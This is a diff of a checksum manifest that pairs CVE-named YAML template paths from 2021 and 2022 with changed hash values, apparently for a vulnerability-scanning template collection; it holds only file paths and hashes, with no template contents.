-http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 +http/cves/2021/CVE-2021-42887.yaml:b652a696751484e4fe62faa5f76b35173b2750d1 +http/cves/2021/CVE-2021-43062.yaml:3ad8c35e2a4d1d1eb6575e9bfa202614ff9bf45c +http/cves/2021/CVE-2021-43287.yaml:89df229aa87f93a0d9b8a0862fc87506c394d086 +http/cves/2021/CVE-2021-43421.yaml:9e9538c9f9a44082df040bc55a071f244bf1c0bc http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 -http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 -http/cves/2021/CVE-2021-43510.yaml:6a715fa92f6c950a00c0fc1fc6c9529c85af44ac -http/cves/2021/CVE-2021-43574.yaml:09592ca52ecc2e5af5af7e8dc8ff0e993ed3964d -http/cves/2021/CVE-2021-43725.yaml:88b96d3de9522c637b1f65061f612d2e28057641 -http/cves/2021/CVE-2021-43734.yaml:e894c25dddf786720827f0d04cbb1ce62b0fc5a3 -http/cves/2021/CVE-2021-43778.yaml:a818c4a9529440a5ef1d0cee1137bfeb81f8fb8f -http/cves/2021/CVE-2021-43798.yaml:3fda0fce3323a14832f734cfd676fde41f594185 -http/cves/2021/CVE-2021-43810.yaml:f5e09afb19cc82f7eea63a4c419e1cf03fb8d4f4 -http/cves/2021/CVE-2021-44077.yaml:6b520f9b38a52e6be45d90a39ea3b27e2a60e5a9 -http/cves/2021/CVE-2021-44138.yaml:3ed6442569d763d03a386d077dc0bfe58065c5dd -http/cves/2021/CVE-2021-44139.yaml:3c3960880978e880e2074828a0b4733bf34175e8 -http/cves/2021/CVE-2021-44152.yaml:cfadff3f08b9e7d6c7b50daa97354ef2898ae8e1 -http/cves/2021/CVE-2021-44228.yaml:eab008e5f47b798c36d737835d6e8c5320151056 -http/cves/2021/CVE-2021-44427.yaml:8352d5bef0fff2a9e40667ca0261b77cb84a8d74 -http/cves/2021/CVE-2021-44451.yaml:2f0210462f32cf9543ddca83b1b9d4f7d1017ee6 -http/cves/2021/CVE-2021-44515.yaml:88c0f1db2a20ac5b093db8f821f1486d13e566ae -http/cves/2021/CVE-2021-44528.yaml:ef4c6bac1cb0df014cfa2c08070a86efe58f5419 -http/cves/2021/CVE-2021-44529.yaml:7ae36c90617c36ff8e6b61552b67bb5ac6cbf054 -http/cves/2021/CVE-2021-44848.yaml:1d0b33807b84d51bfa36eaa82d33585be45e5d43 +http/cves/2021/CVE-2021-43496.yaml:e5290c4bf73b51d8d7a9b72b786da52c792efacc +http/cves/2021/CVE-2021-43510.yaml:5bbb323d593178e5a7fad0f15f9ce444cc54660a +http/cves/2021/CVE-2021-43574.yaml:58127d69ee6b55562a1adb0d6c8727a953f75d84 +http/cves/2021/CVE-2021-43725.yaml:41ce9d637952eb2ca404f208919ceb9cfe13dc6d +http/cves/2021/CVE-2021-43734.yaml:dba526b082cfc049008079854f5c358cdc54dc74 +http/cves/2021/CVE-2021-43778.yaml:ad88d645783c6b9746154a4117a8ca7959b9ca96 +http/cves/2021/CVE-2021-43798.yaml:de04e3df23ebd2c069be1b336f0012aac224cd20 +http/cves/2021/CVE-2021-43810.yaml:526535289d787090ef90d066f958104848576da4 +http/cves/2021/CVE-2021-44077.yaml:1644a3a64ebce7407238683eb03183ff9c26bd36 +http/cves/2021/CVE-2021-44138.yaml:3c5c76e5460123baafa27dd63bb85b79548a6df3 +http/cves/2021/CVE-2021-44139.yaml:fa88a23765b635e301c27d0c9156c82885acd14c +http/cves/2021/CVE-2021-44152.yaml:8b5d9cf98c57998620f4fa6442de1afa32329253 +http/cves/2021/CVE-2021-44228.yaml:f545ebcc0e97655ca69d29d9f4621a84bf8f1c11 +http/cves/2021/CVE-2021-44427.yaml:6b68d18623ee449f8123ae7d1814abea2ebba95c +http/cves/2021/CVE-2021-44451.yaml:d426662cca643eebe07c7c3ffa4ee527ae38c573 +http/cves/2021/CVE-2021-44515.yaml:2377df3a403f2b0e4348f80c3d8a0657dcfe6767 +http/cves/2021/CVE-2021-44528.yaml:dd96edc7d677dbffbb885fa6e72343c6d483e914 +http/cves/2021/CVE-2021-44529.yaml:cf9873ecc8d0687caf0d1ec7437ad2a149444a92 +http/cves/2021/CVE-2021-44848.yaml:72866e10d920ae7ab6caef5d0b943cb17ab72665 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:3dc1a30e775cf97df6480b960e7de4dace503f16 -http/cves/2021/CVE-2021-45046.yaml:ab54d8d7c41b72e6af22ab1c0316179ca0721022 -http/cves/2021/CVE-2021-45092.yaml:c011343d701055e65c405a97e6018769b6eac7e3 -http/cves/2021/CVE-2021-45232.yaml:e55af1872e98119ef827bb4601f54ea270b9e0db -http/cves/2021/CVE-2021-45380.yaml:b0a36ebbdf9d11c1e87ff821fc37941d813b7674 +http/cves/2021/CVE-2021-45043.yaml:4db365b28f347995f9a00d0cf3a86607d90450b7 +http/cves/2021/CVE-2021-45046.yaml:0b49378253d16c99f2ee11fbae7118a9bc97b1a0 +http/cves/2021/CVE-2021-45092.yaml:1dba004d7ee00fa91c11183e02de07b361e0bf4f +http/cves/2021/CVE-2021-45232.yaml:d2c1bafb15044e35687dd8b61324bbcaa9663c97 +http/cves/2021/CVE-2021-45380.yaml:28a8998161318fb791ec581cb4c6a3c5245833d4 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:d382e98a7b5b5975441bb2c9e805b1153cdcc4a6 -http/cves/2021/CVE-2021-45428.yaml:05a5171c50d7f024aa4e877dde0dd2b347506058 +http/cves/2021/CVE-2021-45422.yaml:5f575fea8f02589ffefda0f7bbb15ed05cb6e06a +http/cves/2021/CVE-2021-45428.yaml:7a5a27ecbf32f0b4d97e631a5b7dff3c5273918e http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 -http/cves/2021/CVE-2021-45968.yaml:d1d66fda8d1879cb454059dfd09ba2b346b5a388 -http/cves/2021/CVE-2021-46005.yaml:6bb2ff9807d5a97455e9257bbace6106a4cb7ea7 +http/cves/2021/CVE-2021-45968.yaml:d6e44da357371f41e4af563fb03bccd9de105665 +http/cves/2021/CVE-2021-46005.yaml:37a4af6e976d9154a3acd2b3114fc430ffe28688 http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 -http/cves/2021/CVE-2021-46069.yaml:5b336e29b8031fcb6ce1ff4cf3e3c67cec37f179 -http/cves/2021/CVE-2021-46071.yaml:fd032d70b32714340431310aceb49947c0b47b62 -http/cves/2021/CVE-2021-46072.yaml:2972404e42dd53a3fd50761bbb516f8270d56932 +http/cves/2021/CVE-2021-46069.yaml:263123f9863d0fff4b12647b2af0d70f61e1da93 +http/cves/2021/CVE-2021-46071.yaml:be69e1de19a625ea890c5adc664197ed219e5c5c +http/cves/2021/CVE-2021-46072.yaml:c94fbbed0b6f71806b45297c2ad54aaeac656efe http/cves/2021/CVE-2021-46073.yaml:370eac8c9753d59b40b3ace444f6ac9875a63e30 -http/cves/2021/CVE-2021-46107.yaml:b5e0e7c9a7fa1bcfb1fcc5d76055c0ef6365e6fa +http/cves/2021/CVE-2021-46107.yaml:b9bad6acbf7575d9c393b2564265e1a5691f1c46 http/cves/2021/CVE-2021-46379.yaml:8d6452a442fe0d4a02cdb518cb4b8c8b1a74ef0f -http/cves/2021/CVE-2021-46381.yaml:5d6a99225c83ecb36c7c8171667062ca3f32ba7c -http/cves/2021/CVE-2021-46387.yaml:8fab3f08cc901f449d942141a859729988cdc5ae -http/cves/2021/CVE-2021-46417.yaml:f4478dbdfb7f794c667f00087b7906ad4b328a82 -http/cves/2021/CVE-2021-46418.yaml:1427f7b8ad7adbbe6c5731442531557e1595eb17 -http/cves/2021/CVE-2021-46419.yaml:ee41acae4b7831d15d1c5071f1374d3cb7005c53 -http/cves/2021/CVE-2021-46422.yaml:1940500e991d897184dd58695ffadcf0e79a4762 -http/cves/2021/CVE-2021-46424.yaml:ed75719db1cbc4a6ffca8c5aab06acf3737811d1 -http/cves/2021/CVE-2021-46704.yaml:bb0991b368daf0247f160096c06a9f3c4df48315 -http/cves/2022/CVE-2022-0087.yaml:079b5b165f0ced4d2b4d19011aed225edf88922d +http/cves/2021/CVE-2021-46381.yaml:75b38da693dfd3d74f643fe7a39ee9dfcdfbab34 +http/cves/2021/CVE-2021-46387.yaml:820741fa5c155a62a65ae03741bade8e1b8316cb +http/cves/2021/CVE-2021-46417.yaml:184828b0c60562bd2dfa267fb1cb42935258ef31 +http/cves/2021/CVE-2021-46418.yaml:0f395c12b1e0e2faa82edd9aea14d17d6771f97a +http/cves/2021/CVE-2021-46419.yaml:e2a58404236416ee7faf026547c70a201b604f58 +http/cves/2021/CVE-2021-46422.yaml:41d3ddae9c0fd140ccaccf65b05c44de8071d9ff +http/cves/2021/CVE-2021-46424.yaml:0a01448b7eebb11fa41787e31ff4df5ae1b80cfc +http/cves/2021/CVE-2021-46704.yaml:75ccf63cb86b0455de6ed2f3a18f9461036f737d +http/cves/2022/CVE-2022-0087.yaml:96d30fc9b4ecbcc340068ec0a2e0893ff40f1752 http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 -http/cves/2022/CVE-2022-0147.yaml:1a83d39854e41065ebcf4dc8e6d67d9125b82e16 -http/cves/2022/CVE-2022-0148.yaml:5871f1679ebd2c67803f35c27e4f7242100b0136 -http/cves/2022/CVE-2022-0149.yaml:bd2461d7faaad506248071710bb68b1f24db28f9 -http/cves/2022/CVE-2022-0150.yaml:32c8a959cacb99ecdcf009c07e8f4270f9f36180 +http/cves/2022/CVE-2022-0147.yaml:58d1f7087d04a19479c6059d2a351e89067e57cf +http/cves/2022/CVE-2022-0148.yaml:c519410ada58a1024c581fbb8390ee16fce23b5c +http/cves/2022/CVE-2022-0149.yaml:cdaa1e7fa3d3965d3a5a7e68d7ed2ee002783309 +http/cves/2022/CVE-2022-0150.yaml:92f4eda8d824338d40eff023455effea0deed7c6 http/cves/2022/CVE-2022-0165.yaml:e21ba3dfe35f2b3998366d54a92f873f4a043135 -http/cves/2022/CVE-2022-0169.yaml:5d2ef28e8cae4b8d9d50cb0c26382febdef06876 -http/cves/2022/CVE-2022-0189.yaml:2ac4be867e0f6f5947612f92518844456426e4b9 +http/cves/2022/CVE-2022-0169.yaml:ae25c860e5de463251aae8fe4403d4819809ab4f +http/cves/2022/CVE-2022-0189.yaml:378e59aea7a1b26e04c778902959a4bd92d7bfa3 http/cves/2022/CVE-2022-0201.yaml:04312080723927883df87137d0d5eb769d3c4045 -http/cves/2022/CVE-2022-0206.yaml:98538983614b5435d052063d5025620d45d34cc3 +http/cves/2022/CVE-2022-0206.yaml:5f45d476b92fcb037c75b1f3a91136ac8e8007c2 http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 -http/cves/2022/CVE-2022-0212.yaml:0d32006ad209e1e5adf8201352c8e1a2c2df999f +http/cves/2022/CVE-2022-0212.yaml:569f37fa82968453259475bb02344ce05c1f1238 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 http/cves/2022/CVE-2022-0220.yaml:b3d359e13bca582b964565a09419347cfde13608 -http/cves/2022/CVE-2022-0228.yaml:a83d72a11518097b60bec9335805abbea9d4897b -http/cves/2022/CVE-2022-0234.yaml:c156dc2ea8b3495550a16bb001815a2a5ceba986 -http/cves/2022/CVE-2022-0271.yaml:2d67c3123eda5c25890bd0e102c596bf82ddb1f8 -http/cves/2022/CVE-2022-0281.yaml:72f9de367730580e99ca7db6ce543b8fd402bed8 -http/cves/2022/CVE-2022-0288.yaml:ef6ef3e095085b49d1ff00fcda67de32817a4fad -http/cves/2022/CVE-2022-0342.yaml:656cc5253901ce8a96b491eacf85d37063ef2740 +http/cves/2022/CVE-2022-0228.yaml:6b2faa22a3cc9535bbc2118316d8c0a5c85d691d +http/cves/2022/CVE-2022-0234.yaml:1bf0c595f2a6fde1563f84feb27890832a698099 +http/cves/2022/CVE-2022-0271.yaml:982ff0fc90e3568327d23b1b61e5474792599782 +http/cves/2022/CVE-2022-0281.yaml:f7e979cfdee4932734b6f202712c5bf02067a72a +http/cves/2022/CVE-2022-0288.yaml:f1cf4803487648721e9ed10c23c2de84dd60e245 +http/cves/2022/CVE-2022-0342.yaml:a0b57e0b25d6bd42a09f0e97e76fd6067b2e9f2d http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 -http/cves/2022/CVE-2022-0349.yaml:ef97eb036c6f3261a351b7779f241326b22294af -http/cves/2022/CVE-2022-0378.yaml:103ae4154a5392f886c8b9d7c8597d8b8c61bcd9 +http/cves/2022/CVE-2022-0349.yaml:fdde6d3801452f54280f76f5b7218e6af3874c20 +http/cves/2022/CVE-2022-0378.yaml:f9b45d78cc2fa38664b2888e1a6668e0f8db071e http/cves/2022/CVE-2022-0381.yaml:bab0c1f47359cc9c8960f33d7266351eb1565086 http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 -http/cves/2022/CVE-2022-0415.yaml:3bdb92c7b27807c3cf304dd2bc7c58a58755e97a -http/cves/2022/CVE-2022-0422.yaml:7c3f7d09252b28f990cef76bca9828374832eb5a -http/cves/2022/CVE-2022-0424.yaml:e72d924c262da43cc29df390775f35e6d387600a -http/cves/2022/CVE-2022-0432.yaml:ed86ddc9724813ca30f45216f1b7259f8e9795f5 -http/cves/2022/CVE-2022-0434.yaml:549395197b6ca57a38df261767d51ea9cbd3eb2e +http/cves/2022/CVE-2022-0415.yaml:43badfdc1cb603cabd639e037e7ca72baa540347 +http/cves/2022/CVE-2022-0422.yaml:8955d66723dc59c09675534435b4c93aa2cef1fa +http/cves/2022/CVE-2022-0424.yaml:f09a2112a5421d11aac45e34938d600b74c71333 +http/cves/2022/CVE-2022-0432.yaml:b492288e1d57520617110aa8577bcf2bf832c785 +http/cves/2022/CVE-2022-0434.yaml:e695ba2491bce90444a1058b27bef6690c4865b3 http/cves/2022/CVE-2022-0437.yaml:6a57d2ad863ac623a9a0ce5108e7620bd56e11fa http/cves/2022/CVE-2022-0441.yaml:c0d4b5a324d0e9415535f698f4ee3278d8225377 http/cves/2022/CVE-2022-0482.yaml:06f529926dbce7d867c0aa57cea96bc261ae7feb -http/cves/2022/CVE-2022-0533.yaml:2c80e7cf8c05ef1937dae10f2d8a91c35b5911c6 +http/cves/2022/CVE-2022-0533.yaml:8efd15c2a82f958f59acde765060ab45e5170dee http/cves/2022/CVE-2022-0535.yaml:12c5101dc64287aa7ed4e6e95b4c82b2e507ace5 http/cves/2022/CVE-2022-0540.yaml:a3a2456f497dd9162f512c1cefdc2ae77cb2bfb5 http/cves/2022/CVE-2022-0591.yaml:fd13351808c85fd8f0b666270fe6d7afaadab094 http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 -http/cves/2022/CVE-2022-0597.yaml:0c8ae035c83c4d7e3ef71117a9eacb6bd716a335 -http/cves/2022/CVE-2022-0599.yaml:e02a459e7e195b7676a70f59e47a9d1c353461e1 -http/cves/2022/CVE-2022-0651.yaml:a2ea81e257cc617f153868652e6ad67d4e40bd69 -http/cves/2022/CVE-2022-0653.yaml:202cc5e88f93d969735d9e3193d283a7e06e8ca3 -http/cves/2022/CVE-2022-0656.yaml:2a60d736d0fd75de3ab8d772b91f70f3bb05a248 -http/cves/2022/CVE-2022-0658.yaml:e6836815fe3551cf116830fb171cae9ec27cb00d -http/cves/2022/CVE-2022-0660.yaml:4171a90200d1541b5cfdaeb31c5b1ddf593a9a9c -http/cves/2022/CVE-2022-0678.yaml:1e589bfadd05decd9ff1eae50673c1d333ec4a63 +http/cves/2022/CVE-2022-0597.yaml:d1d3926087f435937d89a594bed0ecd848c8f87c +http/cves/2022/CVE-2022-0599.yaml:5047f9351c72fd3ee1ea33792568fcafffeaa5b6 +http/cves/2022/CVE-2022-0651.yaml:66883e63762a7cfc40b7b1bbe8513e396c0b0808 +http/cves/2022/CVE-2022-0653.yaml:47ee405bc84ddace974e1fda1f02051c1dddf3c2 +http/cves/2022/CVE-2022-0656.yaml:aa79d191591143c2dac13f1550f5823bc4f8cbec +http/cves/2022/CVE-2022-0658.yaml:e9d2506aa81aedd4fcfdb9d9cb911de0aa78d291 +http/cves/2022/CVE-2022-0660.yaml:76399d19000084ed00adedb6c8470124bb24b13f +http/cves/2022/CVE-2022-0678.yaml:b700d1edcc4b2055ff74f19cc3c59fba1e37df8b http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b -http/cves/2022/CVE-2022-0692.yaml:39c529ae5a91dfecd9baae14517af65033b58310 -http/cves/2022/CVE-2022-0693.yaml:95a1750372bd447d4a166fa887de5efb45b9df10 -http/cves/2022/CVE-2022-0735.yaml:4f7f932ce9eafc3c24cacff46cb5bf3516728b34 -http/cves/2022/CVE-2022-0747.yaml:8952ffae68a40b8f07140fc38ae99384b3cf5996 +http/cves/2022/CVE-2022-0692.yaml:b1a4dfacd3f66b6caa45ced45b15aaa91c917c79 +http/cves/2022/CVE-2022-0693.yaml:dd7ae739fa250c7ac4a291b5d0c671aeec0c2f58 +http/cves/2022/CVE-2022-0735.yaml:ef04222d839a546ee3cc85be31cf26430e5a9f68 +http/cves/2022/CVE-2022-0747.yaml:c52251229e43870a5ea620229c77c5d597ac5f29 http/cves/2022/CVE-2022-0760.yaml:6cb4a03a430f9731eb6888abbb95be407f48dd01 -http/cves/2022/CVE-2022-0769.yaml:2b38882ff992a6710e5b1d935cd431ee463155b7 +http/cves/2022/CVE-2022-0769.yaml:9ac274bdbd78d38e2ca5aef5fa435045802b6e85 http/cves/2022/CVE-2022-0773.yaml:60911205f06d37439f55025d19e56f3cdef9f67c -http/cves/2022/CVE-2022-0776.yaml:9fb47d353fe80ac20c4dfb70a4ed463f39bc2172 -http/cves/2022/CVE-2022-0781.yaml:9b26046006901eae840424fa21c494362041f1ec +http/cves/2022/CVE-2022-0776.yaml:6cbcf9b4ed542cb22fb375f7ce0876df4ae639e0 +http/cves/2022/CVE-2022-0781.yaml:0806f48764264766afccada2acc2f98827602354 http/cves/2022/CVE-2022-0784.yaml:339ca31d50774616a5f566cb81ab5bd55e46a59b http/cves/2022/CVE-2022-0785.yaml:47eddef2296126f08953940173a7cd6c3611a807 -http/cves/2022/CVE-2022-0786.yaml:d4e04a3b67ca3d919cfd73f5ed272ecc01c0f2ce -http/cves/2022/CVE-2022-0787.yaml:b55da09d4370536807b494540dd2485cd7926d8b +http/cves/2022/CVE-2022-0786.yaml:e363dfd0c1b24a0e57068636616d93beab88103d +http/cves/2022/CVE-2022-0787.yaml:e54f4d8c3fece95a12ded4232445e3aeb6f8475b http/cves/2022/CVE-2022-0788.yaml:5d60f92d349f7fecefec325a40f08d6970a98a99 -http/cves/2022/CVE-2022-0814.yaml:a44122940bfbf44d2103db07dd1e9797055b0617 -http/cves/2022/CVE-2022-0817.yaml:b742b01b45059457e65b2f40d333d3392b8245ba -http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df -http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 -http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 -http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:5c7707d5caef3af0c8a26df70fa01c5bb9eace7e +http/cves/2022/CVE-2022-0814.yaml:34df968bf978c79cd8819e2a503f14a0f9dd272b +http/cves/2022/CVE-2022-0817.yaml:5c431e59ea20592d78af76411e6d3da46e6c757e +http/cves/2022/CVE-2022-0824.yaml:7efd9a9ae0b141acd98b15701ee248154df116c4 +http/cves/2022/CVE-2022-0826.yaml:299c0297ba9281c8b60894c9f1035988adea8661 +http/cves/2022/CVE-2022-0827.yaml:7f902409a5b30eec1b049634f2421620e368aee4 +http/cves/2022/CVE-2022-0846.yaml:9601c3fa97da17932accbde0ba1d9638fd548393 +http/cves/2022/CVE-2022-0864.yaml:2518bb9d221e4206b6027e6fe3fbc28c0c95039c http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce -http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 -http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 +http/cves/2022/CVE-2022-0869.yaml:5f22f9c210878f98fe7d51b3f4d31220448a2b53 +http/cves/2022/CVE-2022-0870.yaml:3370c35e350ac61b23fcbb68a8ab0ae49560ecd6 http/cves/2022/CVE-2022-0885.yaml:841e640a6d3e053d8347a3f6083e082f8add157b -http/cves/2022/CVE-2022-0899.yaml:278013a61ae11ce51e474ecf517491761b5d61e0 -http/cves/2022/CVE-2022-0928.yaml:c0068dcd8a694a946e5b82cc9020c5ad54c8d964 +http/cves/2022/CVE-2022-0899.yaml:ede33b54f00c749d949e67929e400c4dc6938863 +http/cves/2022/CVE-2022-0928.yaml:d80673476c59832b3f7e3787d291ad7efef2ca46 http/cves/2022/CVE-2022-0948.yaml:d81bdba80c595c26ed421d5ac4697749a26423d5 -http/cves/2022/CVE-2022-0949.yaml:d99e1dfae652d1ec70bf341d27363455003ab189 +http/cves/2022/CVE-2022-0949.yaml:dccd7a5fbf9b6f32b37b7108aa597e028f54b4be http/cves/2022/CVE-2022-0952.yaml:7e2d47b7c6fed59342471c942cb0707a354d59ed -http/cves/2022/CVE-2022-0954.yaml:fa61e9ea98d6d816139735db7628c37b53189534 -http/cves/2022/CVE-2022-0963.yaml:c54aa6de98b36acd4b0979ef84e55bbbb4603a53 -http/cves/2022/CVE-2022-0968.yaml:77728489e530e663c33f4201ad9fcfe3c4556d3b -http/cves/2022/CVE-2022-1007.yaml:36edf0bb86b964fca0a5c55adf7106e73043bfcd -http/cves/2022/CVE-2022-1013.yaml:dbe1a0af8c63914f65dcd643751b33214a16dd8c +http/cves/2022/CVE-2022-0954.yaml:85c28e58af00cf2eca329c7151f1ea4426ab711b +http/cves/2022/CVE-2022-0963.yaml:e9b05e33b4b2b10a429c4c0d819bf02bcb9a9b90 +http/cves/2022/CVE-2022-0968.yaml:162d0893c4eeeec34a60489625f19632ed43cb7e +http/cves/2022/CVE-2022-1007.yaml:3fd1301dc8f88363820d4a11e1f127d00118c611 +http/cves/2022/CVE-2022-1013.yaml:0b812916478c24470e327ecc540ccf224458d4fb http/cves/2022/CVE-2022-1020.yaml:59af3f4fbbadc5897088c95b708c639991dc15e6 -http/cves/2022/CVE-2022-1040.yaml:a9df5761dfd259dbb6047478d30e3940d03a7f70 -http/cves/2022/CVE-2022-1054.yaml:c54d411377a17bd5d60263093e2767ee22534673 -http/cves/2022/CVE-2022-1057.yaml:5f46c2dc2bc251298fd7e75c7cd2ba71c2229555 -http/cves/2022/CVE-2022-1058.yaml:63bbd81636d662531c177318f538d2c153aa6adb -http/cves/2022/CVE-2022-1119.yaml:1d0f2bd435628848503dabee8f2eabdf1a86067d -http/cves/2022/CVE-2022-1162.yaml:d8f2146cb3c6f35da4df271ce65a524377507359 +http/cves/2022/CVE-2022-1040.yaml:0338f322d06277a2483b734e7031b90987eca963 +http/cves/2022/CVE-2022-1054.yaml:328b9fc4c45be9ac1cdd955ea0acd35dc90cbd10 +http/cves/2022/CVE-2022-1057.yaml:e7848ebf7ab5cd6c7f4ac9a845a22036bcab95ff +http/cves/2022/CVE-2022-1058.yaml:470bd6029ed9652c473489eaef0d4cf53d4ca515 +http/cves/2022/CVE-2022-1119.yaml:34c32126dab5750c175f12ff4584910304e832a9 +http/cves/2022/CVE-2022-1162.yaml:13fbccfd9e0e667925edf8fa16f30d3db2e3a50c http/cves/2022/CVE-2022-1168.yaml:93e0ac42cd3ee8391d615a78f9eac80ae749aa8f -http/cves/2022/CVE-2022-1170.yaml:656973b0f6a3a05600c594153da9d4827b55d0ae -http/cves/2022/CVE-2022-1221.yaml:4b2e536b8cd12c2e3967a186d960d439e1c5c1d5 -http/cves/2022/CVE-2022-1329.yaml:40402840e458955c5ba08aaf4e554cec1191b725 -http/cves/2022/CVE-2022-1386.yaml:f3455ff74125eade27ea2a398eb455e4670bd6ab -http/cves/2022/CVE-2022-1388.yaml:9583c72090e4d3a4b6aab41092bc252b431674e2 +http/cves/2022/CVE-2022-1170.yaml:4d896ab7996ee645f8f6d119dcc055dfa7998f6e +http/cves/2022/CVE-2022-1221.yaml:d7a6fa47284e7090b839907667c9296ba9e0b086 +http/cves/2022/CVE-2022-1329.yaml:b581942b2d9b46c5638853c3300a1d05fb9f7bdc +http/cves/2022/CVE-2022-1386.yaml:2f7a2b089ae2690a801e91ac4dd7b8710fa5e649 +http/cves/2022/CVE-2022-1388.yaml:c30f8e0fdcd48a2feee836e33401c76ea2d859c8 http/cves/2022/CVE-2022-1390.yaml:cdda5e7620a740024ec05c775b94861e6885853a -http/cves/2022/CVE-2022-1391.yaml:89490c3f0354d4aa7ba547c029bfe867ea975b4e -http/cves/2022/CVE-2022-1392.yaml:c3e545e3a05ffcc1d736639e307a7b7d453f1026 +http/cves/2022/CVE-2022-1391.yaml:cce47bb47c7e144b8ee9ab3a94b77bcfbc551c5d +http/cves/2022/CVE-2022-1392.yaml:3e6660c3bacc2eb9f7f6b8025e0415ab25f5815b http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed -http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 -http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 -http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c -http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb +http/cves/2022/CVE-2022-1439.yaml:66bc3d1bb1b6f206de5661adc27251d2e699c521 +http/cves/2022/CVE-2022-1442.yaml:5721248036a2fff83a52bed27124718e08d95d69 +http/cves/2022/CVE-2022-1574.yaml:0d5ac3e5ddcac8da6a4cfd8f8e018d7951fd31fd +http/cves/2022/CVE-2022-1580.yaml:f1574e38e79dadd9b5e08bfec6dd4a4a0783d66d http/cves/2022/CVE-2022-1595.yaml:e62d387c391349d9a30991379aff1b17d5af912d -http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c -http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e +http/cves/2022/CVE-2022-1597.yaml:90c6391409dddfaf4f3a7643d597e772deb4841b +http/cves/2022/CVE-2022-1598.yaml:0bf3a544454936cf7db585b6002c4eaa84fa72cc http/cves/2022/CVE-2022-1609.yaml:3997b6a9aec82ff2e552d1b8f53e34f0d61de38d -http/cves/2022/CVE-2022-1713.yaml:c5fbebd8e2a8cda7cfe55dbc1c9e5f22425b8dd3 +http/cves/2022/CVE-2022-1713.yaml:9828ac75de83bc7801f83da9ec2d29eb92e740bf http/cves/2022/CVE-2022-1724.yaml:51995547bb5168cd0645a5adf37a850a5a1e6b87 -http/cves/2022/CVE-2022-1756.yaml:ca0099ae7fbcc4949168b4b66c4b4074b76ee6a1 -http/cves/2022/CVE-2022-1768.yaml:aa9ca20c0960213c17f9480a23b85b27b158a2b2 -http/cves/2022/CVE-2022-1815.yaml:296a8cbfefffefd5689f6fd7d4290d909aeb44c8 +http/cves/2022/CVE-2022-1756.yaml:b92f855ff00dc428a7c2a1605ce49eb0c71d76b1 +http/cves/2022/CVE-2022-1768.yaml:69b204d4963e3d0ebf9ec6196014834b9292034e +http/cves/2022/CVE-2022-1815.yaml:20befc0f7d15db67af95a179b70085b63ece11b9 http/cves/2022/CVE-2022-1883.yaml:9ea27969a99bb6fcb353913f3c079f33f01a3e3c -http/cves/2022/CVE-2022-1903.yaml:208a095a1fad78459a646c1dd69fd85f48f946c3 +http/cves/2022/CVE-2022-1903.yaml:811c45ec923ddd51a1c5c1405ad8c120ae19de74 http/cves/2022/CVE-2022-1904.yaml:8364554cac977f888ab267875d02bbf1f2cb924b http/cves/2022/CVE-2022-1906.yaml:32a30dcf31d119545c4e7d34db4609089bf3fab5 http/cves/2022/CVE-2022-1910.yaml:285281f4e315d751f66c43077868a0c660fa544c http/cves/2022/CVE-2022-1916.yaml:c49dfcef4c446dc595f69fc553a3ac2a70461b5c http/cves/2022/CVE-2022-1933.yaml:698dc72c8292ca8e6b7d5b7c52c9a8ea39407718 -http/cves/2022/CVE-2022-1937.yaml:7e5f553c9ebe4b5a0945822af6c31a8efb8def26 -http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d +http/cves/2022/CVE-2022-1937.yaml:e941acf92cd1c96a4470945fa811aa93626bc5c5 +http/cves/2022/CVE-2022-1946.yaml:0b56e0e84129d6dd88a849695cb99a8c9d3dce6c http/cves/2022/CVE-2022-1952.yaml:94de725f4880107f8c58454b17b55f6e934d94bf -http/cves/2022/CVE-2022-2034.yaml:e6a1b542f667903a5f16aca40d8940497e933818 -http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 